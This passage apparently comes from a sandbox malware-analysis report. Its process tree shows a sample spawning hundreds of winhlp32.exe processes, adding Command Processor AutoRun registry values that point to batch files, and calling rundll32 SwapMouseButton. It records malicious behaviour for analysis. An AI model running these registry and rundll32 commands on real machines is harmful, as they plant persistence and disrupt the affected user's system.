      4⤵
      PID:13104
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12596
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10936
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12096
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11728
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11716
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12088
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11964
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12340
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12420
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12224
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:4968
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:6520
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14148
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14256
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:5312
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:7828
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9324
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:5268
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:7900
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12812
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8024
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:3256
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11160
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13248
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12752
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11380
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10800
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:7740
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10928
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10180
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11260
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12784
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8476
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13300
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10020
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9704
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12180
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9088
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:4376
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:1924
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9792
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8708
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:7500
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11004
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10124
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:4796
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10196
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14308
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:1648
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14252
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9544
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:1912
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10192
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12168
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14136
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14304
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11564
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14284
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:4936
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11244
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:7736
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9344
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14108
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11280
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14280
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9388
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9640
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9752
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11608
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9288
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:4820
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11592
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11124
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10792
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:5456
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11488
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12656
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12888
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8916
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9956
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11060
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14124
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11984
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14012
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:2376
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9268
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11524
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14644
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14684
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14700
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14716
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14728
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14752
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14780
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14792
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14812
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14852
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14864
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14876
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14904
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14924
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14944
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14976
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:14996
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Bettercelery.bat" /f
    3⤵
    PID:4320
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Windows64Driver.bat" /f
    3⤵
    PID:4308
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Sakpot.bat" /f
    3⤵
    PID:5088
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d Sakpot /F
    3⤵
    - Modifies registry key
    PID:4284
- - C:\Windows\system32\rundll32.exe
    C:\Windows/system32/rundll32 user32, SwapMouseButton
    3⤵
    PID:3928
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REGSZ /d "C:\Windows\system32\batinit.bat" /f
    3⤵
    PID:4112
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:4764
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:4148
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:2332
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:956
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:696
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:724
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:5020
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:4736
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:4376
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:4364
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:4340
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:2184
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:4512
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:1936
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:4168
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:4732
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:6980
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:7532
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:7580
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:7588
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:7596
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:7604
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:7616
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:7624
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:2304
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:4508
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:5016
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:6484
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:7248
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:2660
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:4940
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:180
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:7404
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:4972
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:4524
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:6312
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:4764
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:8648
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:9560
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:10040
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:10008
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:2024
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:9728
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:9704
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:9596
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:9444
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:9288
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:9432
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:9392
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:9800
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:9804
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:8556
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:9344
- - C:\Windows\winhlp32.exe
    winhlp32
    3⤵
    PID:9280
- C:\Windows\system32\reg.exe
  reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Bettercelery.bat" /f
  2⤵
  PID:4512
- C:\Windows\system32\reg.exe
  reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Windows64Driver.bat" /f
  2⤵
  PID:2232
- C:\Windows\system32\reg.exe
  reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Sakpot.bat" /f
  2⤵
  PID:4492
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d Sakpot /F
  2⤵
  - Modifies registry key
  PID:2288
- C:\Windows\system32\rundll32.exe
  C:\Windows/system32/rundll32 user32, SwapMouseButton
  2⤵
  PID:396
- C:\Windows\system32\reg.exe
  reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REGSZ /d "C:\Windows\system32\batinit.bat" /f
  2⤵
  PID:4500
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4456
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:1168
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4152
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4520
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4656
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2488
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:424
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3596
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4640
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:1684
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2096
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:828
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2148
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:1832
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2076
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2236
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3444
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2392
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4608
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5004
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2360
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:916
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:1060
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3944
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4564
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:384
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3612
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3876
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2860
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3288
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5044
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:216
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:1648
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2372
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3432
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:1556
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5136
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5144
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:1496
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7444
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7468
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6592
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7072
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7144
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4492
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3408
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:1312
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4376
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:8332
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9240
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9248
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9460
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9480
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10156
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10224
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4412
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3088
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9496
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:1856
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6024
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9636
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9648
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3132
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7912
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5400
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5524
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4624
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:1620
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10808
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10900
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10912
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10924
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10936
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10952
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11072
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11132
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11140
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11148
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:8132
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10168
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:1736
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4968
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10540
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9388
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9696
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7740
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:8480
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9620
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10376
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:6824
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7556
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9660
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4900
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4716
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:1848
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3944
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9352
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7864
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10200
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2076
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:8244
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:2268
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:4464
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10012
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10040
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:8260
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:992
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:8204
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9748
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10020
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11804
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11892
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11900
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:12248
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:13376
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:13552
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:13672
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10760
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11356
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9324
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11456
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10196
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11308
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5828
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11268
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:12904
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10872
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10752
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11536
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9360
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11720
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11696
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11924
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11624
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11596
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11524
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:12660
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11164
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:8144
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11060
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10648
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:3080
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10680
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5444
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5300
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7532
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10068
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9008
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:8676
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9096
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7536
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10536
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9644
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:12456
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:12644
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:12708
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:12900
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:12796
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:5452
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9532
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:12808
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11368
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:12968
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:14160
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7288
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:13368
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11152
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:12200
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:8448
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11256
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9612
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:14568
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:15508

C:\Windows\helppane.exe
C:\Windows\helppane.exe -Embedding
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:1188
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd218946f8,0x7ffd21894708,0x7ffd21894718
    3⤵
    PID:2988
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,1181188765087226824,4635189274974560054,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
    3⤵
    PID:5408
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,1181188765087226824,4635189274974560054,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
